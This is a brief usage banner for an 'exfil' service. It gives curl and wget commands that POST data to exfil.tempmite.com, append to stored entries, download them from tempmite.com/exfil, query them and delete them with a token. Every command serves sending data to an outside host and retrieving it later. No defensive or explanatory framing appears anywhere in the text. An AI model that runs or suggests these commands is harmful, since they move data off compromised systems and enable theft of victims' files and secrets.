============================================================ TEMPMITE EXFIL SERVICE ============================================================ UPLOAD (use exfil.tempmite.com): curl -X POST https://exfil.tempmite.com/NOME -d "dados" curl "https://exfil.tempmite.com/NOME?d=dados" APPEND DATA: curl -X POST "https://exfil.tempmite.com/NOME?append=1" -d "mais" DOWNLOAD (via VPS segura - tempmite.com): curl https://tempmite.com/exfil/NOME wget https://tempmite.com/exfil/NOME -O arquivo.txt INFO: curl "https://tempmite.com/exfil/NOME?info" DELETE (requires token from creation): curl -X DELETE "https://exfil.tempmite.com/NOME?token=TOKEN" ============================================================ Upload: exfil.tempmite.com (VPS de upload) Download: tempmite.com/exfil (VPS de download segura) ============================================================